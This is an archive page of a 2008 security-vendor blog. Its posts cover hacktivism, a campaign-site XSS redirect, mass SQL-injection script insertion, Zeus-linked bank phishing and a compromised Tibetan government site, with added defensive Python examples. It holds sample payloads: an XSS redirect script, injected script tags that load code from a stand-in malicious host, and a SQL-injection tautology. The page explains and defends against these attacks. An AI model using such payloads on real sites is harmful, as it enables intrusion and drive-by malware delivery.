
Archive for April, 2008


Apr29
by Paul Ferguson (Advanced Threats Researcher)

While most of the cyber crime activity we see on the Internet is driven by illicit financial incentives, there also appears to be a type of malicious activity driven by other motivations altogether: “Hacktivism”.

Hacktivism is best explained as a combination of “hacking” and “activism”, traditionally rooted in cultural and/or geopolitical unrest. As Wikipedia defines it, Hacktivism is “…the nonviolent use of illegal or legally ambiguous digital tools in pursuit of political ends. These tools include web site defacements, redirects, denial-of-service attacks, information theft, web site parodies, virtual sit-ins, virtual sabotage, and software development.”

In fact, hacktivist incidents stretch back over 20 years, but only in the past couple of years have they become more frequent and more damaging.

The most notable incident of regional hacktivism was the series of Distributed Denial of Service (DDoS) attacks against government and corporate websites in Estonia in 2007, which started a worldwide dialog on the real threat of “cyber attacks” and their impact on national infrastructure.

However, the latest victims of hacktivism appear to be several websites in Eastern Europe belonging to the U.S.-backed Radio Free Europe/Radio Liberty. It was reported Monday that “…the attack, which started on April 26, initially targeted the website of RFE/RL’s Belarus Service, but quickly spread to other sites…”

According to a statement on the Radio Free Europe/Radio Liberty website, RFE/RL had been “…hit before by denial-of-service attacks, but this attack was unprecedented in its scale, as RFE/RL websites received up to 50,000 fake hits every second.”

While incidents of hacktivism are not new, they are becoming a lot more frequent, perhaps because of the availability of tools for hacktivist mischief, but perhaps also because ubiquitous social networking mechanisms can now be used to build consensus quickly when cultural or political unrest presents the opportunity.

In any event, hacktivism is becoming a disturbing trend, and one which can have serious ripple effects that interfere with Internet operational continuity, sometimes in ways we have not even thought of yet.

“Fergie”, a.k.a. Paul Ferguson
Internet Security Intelligence
Advanced Threats Research


Apr29
by Jake Soriano (Technical Communications)

Senators Hillary Clinton and Barack Obama are battling it out on all fronts. In a tight contest with no clear frontrunner so far, the outcome isn’t likely to be decided by the debates alone, so we see extra-political battles in other arenas. The Web is one likely sphere where the hopeful nominee who dominates stands to gain a lot.

The most recent Internet-related clash between the two involved redirection: one candidate’s Web site led users to the site of the other. Users viewing Obama’s site were redirected to Clinton’s through an attack called cross-site scripting (XSS), in which attacker-supplied input is reflected into a page and executed as script by the visitor’s browser. Researchers were also able to reverse the attack, exploiting vulnerabilities in the other direction, and disclosed these glitches to the site owners.
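As an added illustration (not code from the original post, nor from either campaign’s site), the Python below shows the mechanics of a reflected XSS redirect of the kind described above: a page handler that echoes a query parameter verbatim, the payload that turns that echo into a redirect, and the escaped version of the same handler that neutralizes it. The handler names, the “q” parameter and the redirect target are assumptions made for this example.

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs, quote


# Hypothetical handler: echoes the "q" query parameter into the page body.
# The parameter name and page layout are assumptions for this example.
def render_vulnerable(query_string):
    """Reflects user input verbatim into HTML (reflected XSS)."""
    q = parse_qs(query_string).get("q", [""])[0]
    return f"<html><body><p>You searched for: {q}</p></body></html>"


def render_hardened(query_string):
    """Same page, but the reflected value is HTML-escaped, so any markup
    in it is displayed as text instead of being parsed as tags."""
    q = parse_qs(query_string).get("q", [""])[0]
    return f"<html><body><p>You searched for: {html.escape(q, quote=True)}</p></body></html>"


# Constructed payload: once parsed as a tag, it sends the visitor elsewhere.
PAYLOAD = "<script>location='http://other-candidate.example/'</script>"
ATTACK_QS = "q=" + quote(PAYLOAD)  # URL-encoded, as it would travel in a link


class _ScriptFinder(HTMLParser):
    """Records whether a browser-style parser would see a <script> element."""

    def __init__(self):
        super().__init__()
        self.found = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.found = True


def contains_live_script(page):
    """True if the page contains a <script> element as parsed markup,
    False if script text appears only as escaped, inert character data."""
    finder = _ScriptFinder()
    finder.feed(page)
    finder.close()
    return finder.found


if __name__ == "__main__":
    print("vulnerable page executes script:", contains_live_script(render_vulnerable(ATTACK_QS)))  # True
    print("hardened page executes script:  ", contains_live_script(render_hardened(ATTACK_QS)))    # False
```

The hardened handler escapes at the point of output rather than filtering on input; that is the fix that survives whatever encoding the payload arrives in, and it is why the browser sees `&lt;script&gt;` text instead of a tag.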

Internet-related incidents are not new to the coming U.S. presidential election. As early as November last year, TrendLabs reported on spam runs that posed as campaign material for Ron Paul. Clinton herself was featured in a spam run that delivered malware, turning infected systems into bots that spread still more spam.

This time, however, the cross-site scripting attacks are seen as benign, as no malware was involved. With the increasing attention on spamming and other malicious activities, this may be a move driven by caution: those responsible may have realized that malicious activity, once exposed, inevitably taints the individuals involved in the eyes of the media and the public.

Researchers are still investigating how this type of attack could be used in more malicious criminal activity.

Posted in Malicious Websites, News, Spam |

Apr29
by Alice Decker (Advanced Threats Researcher)

Some days ago, our researchers at TrendLabs discovered an attack on Web sites in the European region. Since the number of compromised sites was low, and since they were cleaned immediately, we figured it might be just a proof of concept.

F-Secure researchers also reported a similar attack in which more than 500,000 sites were affected.

The infection code was a <script> tag pointing to a malicious URL. What is new here is that these malicious tags were inserted inside the usual text tags, such as between <title> and </title>. For example:

<title>My Website<script src=http://maliciousURL.com></script></title>

and into <meta>, <a href=...>, <div class="myclass"> and so on, for example:

<a href=http://goodURL<script src=http://maliciousURL></script>>

An infected Web site would display its infection in the browser window title:

Neither <title> nor <meta> is supposed to contain a <script> element, but some browsers are tolerant of such syntax errors and execute script tags wherever they appear.
Visitors to the affected Web sites are thus exposed to whatever the remote script delivers to their systems.
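An added example (not from the original post, nor TrendLabs’ own tooling) that checks a page for the pattern described above: script or iframe markup inside the <title> text, or inside the attribute area of another tag, where it never belongs in legitimate HTML. It flags the placement regardless of whether a particular browser would execute it, which is the check a site owner wants when looking for this infection. The sample page and its hostnames are constructed placeholders; the post redacts the real malicious URL.

```python
import re
from urllib.parse import urlparse

# Constructed sample page modelled on the injection pattern described in the
# post. Hostnames are placeholders, not the real (redacted) malicious URL.
SAMPLE_PAGE = """<html><head>
<title>My Website<script src=http://bad.example.invalid/x.js></script></title>
<meta name="keywords" content="news<script src=http://bad.example.invalid/x.js></script>">
</head><body>
<a href=http://good.example.invalid<script src=http://bad.example.invalid/x.js></script>>home</a>
<div class="myclass">hello</div>
<script src="/static/site.js"></script>
</body></html>"""

# A tag-like span: "<name ...>" up to the first ">". Because the injected
# "<script" lands before the closing ">" of the host tag, it ends up inside
# this span's attribute area, which is exactly what we look for.
TAG_RE = re.compile(r"<(?P<name>[a-zA-Z][a-zA-Z0-9]*)(?P<rest>[^>]*)>", re.S)
TITLE_RE = re.compile(r"<title[^>]*>(?P<body>.*?)</title>", re.I | re.S)
INJECTED_RE = re.compile(r"<\s*(script|iframe)\b", re.I)
SRC_RE = re.compile(r"""src\s*=\s*["']?([^"'\s>]+)""", re.I)


def find_injected_markup(page):
    """Return [(location, snippet), ...] for script/iframe markup found
    inside <title> text or inside another tag's attribute area."""
    findings = []
    for m in TITLE_RE.finditer(page):
        if INJECTED_RE.search(m.group("body")):
            findings.append(("title", m.group("body").strip()))
    for m in TAG_RE.finditer(page):
        name = m.group("name").lower()
        if name in ("script", "iframe"):
            continue  # a script tag's own attributes are not the anomaly
        if INJECTED_RE.search(m.group("rest")):
            findings.append((name, m.group(0)))
    return findings


def injected_script_hosts(page):
    """Hostnames referenced by src= inside the flagged snippets: the
    indicators to block or hunt for across other sites."""
    hosts = set()
    for _location, snippet in find_injected_markup(page):
        for url in SRC_RE.findall(snippet):
            host = urlparse(url).hostname
            if host:
                hosts.add(host)
    return hosts


if __name__ == "__main__":
    for location, snippet in find_injected_markup(SAMPLE_PAGE):
        print(f"[{location}] {snippet}")
    print("hosts:", sorted(injected_script_hosts(SAMPLE_PAGE)))  # ['bad.example.invalid']
```

The regular-expression approach is deliberate: a standards-conforming HTML parser may treat <title> content as plain text and swallow the injected tag, so parsing “correctly” can hide exactly the thing being hunted. A normal script in <head> or <body> is not reported, only script markup in positions where no template would put it.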

The massive infection of Web sites was reportedly carried out through automated SQL injection. This is not the first instance of this type of attack, and unfortunately it will not be the last.

What’s notable about SQL injection is that such attacks can succeed at any time, regardless of the patch level of the SQL server behind the site: the weakness lies in the Web application that builds the queries, not in the database. A Web site that does not validate field content, and that pastes that content straight into the query text instead of binding it as a parameter, is easy to trick into sending the server a query the developer never intended. Simplified, an attacker who types “blah or 1=1” into a user ID field turns the lookup into:

“SELECT * FROM bank_data WHERE Userid=blah or 1=1”
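An added, runnable illustration (not the post’s own code) of the query above against an in-memory SQLite table: the vulnerable lookup pastes the field content into the SQL text, so a tautology in the user ID field returns every row, while the parameterized lookup binds the same input as data and returns nothing. The table contents are constructed. The payload uses a quote to break out of the string literal, since the post’s shorthand omits the quoting a real query would have.

```python
import sqlite3


def make_db():
    """Constructed sample table standing in for the post's bank_data."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE bank_data (userid TEXT, balance INTEGER)")
    conn.executemany(
        "INSERT INTO bank_data VALUES (?, ?)",
        [("alice", 100), ("bob", 250), ("carol", 75)],
    )
    return conn


def lookup_vulnerable(conn, userid):
    """Field content is concatenated into the SQL text, so it can change
    the query's structure (the flaw the post describes)."""
    sql = "SELECT userid, balance FROM bank_data WHERE userid='" + userid + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, userid):
    """Same query with the value bound as a parameter: the database never
    parses the field content as SQL, whatever it contains."""
    return conn.execute(
        "SELECT userid, balance FROM bank_data WHERE userid=?", (userid,)
    ).fetchall()


# Constructed payload: closes the string literal, then appends a tautology.
# The resulting WHERE clause matches every row in the table.
PAYLOAD = "blah' or '1'='1"


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", lookup_vulnerable(db, PAYLOAD))  # all three rows
    print("safe:      ", lookup_safe(db, PAYLOAD))        # []
    print("safe/alice:", lookup_safe(db, "alice"))        # [('alice', 100)]
```

Note that input filtering alone (the “field content checking” the post calls for) only narrows the problem; binding parameters removes it, because the value can never be interpreted as part of the statement.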

The moral of this story is that cyber criminals will have an easy game as long as Web sites are built with construction kits or by inexperienced developers who may not consider checking field content.

Trend Micro users are already protected, first through a generic detection of the script as HTML_IFRAME.YC, and also through Web Threat Protection.

Posted in Malware |

Apr28
by JM Hipolito (Technical Communications)

Our friends at RSA recently reported on the latest one-two punch employed by the infamous Rock Phish gang (also reported here and here). Best known for easy-to-use kits that yield professional-looking phishing pages, Rock Phish now adds information-stealing malware, dubbed the Zeus Trojan.

This attack is reminiscent of the Bank of America phishing attack we reported several days ago, in which users were prompted to install a “digital certificate” in order to reach the bank’s online login page. Incidentally, that phishing page was also Rock Phish.

And apparently there are more: Trend Micro Advanced Threats Researcher Paul Ferguson and the TrendLabs Content Security team came across a couple of malicious “certificates”, detected as TSPY_PAPRAS.AC and TSPY_PAPRAS.AD, which target Comerica and Colonial banks, respectively.

Below are screenshots of the phishing email and Web page targeting Comerica account holders:

Comerica email

Comerica certificate page

Traditional phishing involves sending email messages that lead users to a fake Web site resembling the login page of an institution or company. This time the phishers have made sure they can collect sensitive information even without getting users to log on to a fake page: they plant spyware on the user’s system so that any relevant user action is transmitted to a remote server. Unprotected users thus stand to lose sensitive information.

This recent development makes it even more important to remind users to be wary of clicking links in email, and to keep scanning engines up to date.

Additional text by Paul Oliveria

Posted in Malware, Phishing |

Apr21
by Jovi Umawing (Technical Communications)

Late last week, Trend Micro Senior Threat Researcher Paul Ferguson reported a Web site compromised by a malicious JavaScript that leads visitors to a known Graphics Device Interface (GDI) exploit.

You may recall that this critical vulnerability gives a remote attacker complete control over a vulnerable system once a specially crafted .EMF or .WMF image file is rendered. The compromised site is the official Web site of the Tibetan government in exile.

Visitors to that site unwittingly download an embedded malicious JavaScript:

    http://www.tibet.com/{BLOCKED}/tibet.js

A closer look at the script reveals that it refers to the following sites, which contain iFrame tags pointing to malware files and the GDI exploit:

  • http://ad.{BLOCKED}.googlepages.com/ad02.jpg - the GDI/WMF exploit file, which Trend Micro detects as HTML_EXP.AZ
  • http://ad.{BLOCKED}.googlepages.com/rm03.html - the obfuscated JS file, which is detected as HTML_EXP.AA
  • http://ad.{BLOCKED}.googlepages.com/142.htm - the obfuscated Visual Basic (VB) script, which is detected as VBS_VBSWGBASE.BH

Trend Micro detects the JS file, tibet.js, as HTML_IFRAME.OB.
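The loader chain described above, walked offline as an added example (not the post’s own analysis tooling): every src= reference is followed breadth-first from the compromised page, through the embedded JavaScript, to the iframes it writes, and the hosts that are not the site’s own are reported as the indicators to block. The fetched contents, hostnames and paths are constructed placeholders standing in for the redacted URLs; in practice the fetch callback would be a cautious downloader, not a dictionary lookup.

```python
import re
from urllib.parse import urljoin, urlparse

# Constructed stand-in for what an analyst would have fetched, keyed by URL.
# Hostnames and paths are placeholders; the post redacts the real ones.
FETCHED = {
    "http://site.example.invalid/index.html":
        '<html><body><h1>Welcome</h1>'
        '<script src="/js/site.js"></script></body></html>',
    "http://site.example.invalid/js/site.js":
        'document.write("<iframe src=\\"http://ad.example.invalid/rm03.html\\" '
        'width=0 height=0></iframe>");',
    "http://ad.example.invalid/rm03.html":
        '<html><body><iframe src="ad02.jpg"></iframe>'
        '<iframe src="142.htm"></iframe></body></html>',
    "http://ad.example.invalid/ad02.jpg": "<exploit bytes>",
    "http://ad.example.invalid/142.htm": "<script language=vbscript>...</script>",
}

# Matches src= in HTML attributes and in JavaScript-written markup alike,
# including the escaped quotes (src=\"...\") inside a document.write string.
SRC_RE = re.compile(r"""\bsrc\s*=\s*\\?["']?([^"'\\\s>]+)""", re.I)


def referenced_urls(base_url, content):
    """Absolute URLs of every src= reference found in a fetched resource."""
    return [urljoin(base_url, u) for u in SRC_RE.findall(content)]


def walk_chain(start_url, fetch):
    """Breadth-first walk of every resource reachable through src= links.
    `fetch(url)` returns the body as text, or None if unavailable."""
    seen, order, queue = set(), [], [start_url]
    while queue:
        url = queue.pop(0)
        if url in seen:
            continue
        seen.add(url)
        order.append(url)
        content = fetch(url)
        if content is None:
            continue
        for ref in referenced_urls(url, content):
            if ref not in seen:
                queue.append(ref)
    return order


def external_hosts(start_url, chain):
    """Hosts in the chain other than the compromised site's own."""
    own = urlparse(start_url).hostname
    return sorted({urlparse(u).hostname for u in chain if urlparse(u).hostname != own})


if __name__ == "__main__":
    start = "http://site.example.invalid/index.html"
    chain = walk_chain(start, FETCHED.get)
    for url in chain:
        print(url)
    print("external hosts:", external_hosts(start, chain))  # ['ad.example.invalid']
```

The walk is deliberately static: nothing is executed, so an obfuscated loader that only assembles its URLs at run time would need a deobfuscation pass first. The value of the chain is that it yields the full set of hosts in one go, rather than one URL per manual hop.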

Obviously, cyber criminals still find issues concerning Tibet, China, and the Olympics to be hot topics. TrendLabs has documented a couple of such occurrences here and here.

One may take this as just another case of one party going head-to-head with an opposing party using malware. It is easy to point to hacktivists with political agendas, especially since news surfaced over the weekend of Chinese hackers supposedly planning a distributed Denial-of-Service attack. The attack was to be a protest against CNN coverage that was deemed “pro-Tibet,” but it never transpired. Anti-CNN.com, a Chinese Web site created solely to expose the Western news company’s “biases,” urged street protests in European countries.

Though no proof was established of a connection between the anti-CNN movement and the supposed hacking incident, a team that had been investigating Chinese hackers believed the online attacks were meant to go hand in hand with the street protests. Think of it as a synchronized protest in the physical and digital worlds. CNN has already released a statement regarding its Tibet coverage.

Chinese hackers did, however, manage to disrupt the SportsNetwork Web site, as reported here on TechCrunch.

Keep patches up to date to protect your systems from being exploited. At the same time, Trend Micro urges users to regularly update pattern files for improved protection. Note that all related malicious Web sites are already blocked by the Content Security Team.

Posted in Security |


© Copyright 2008 Trend Micro Inc. All rights reserved. Legal Notice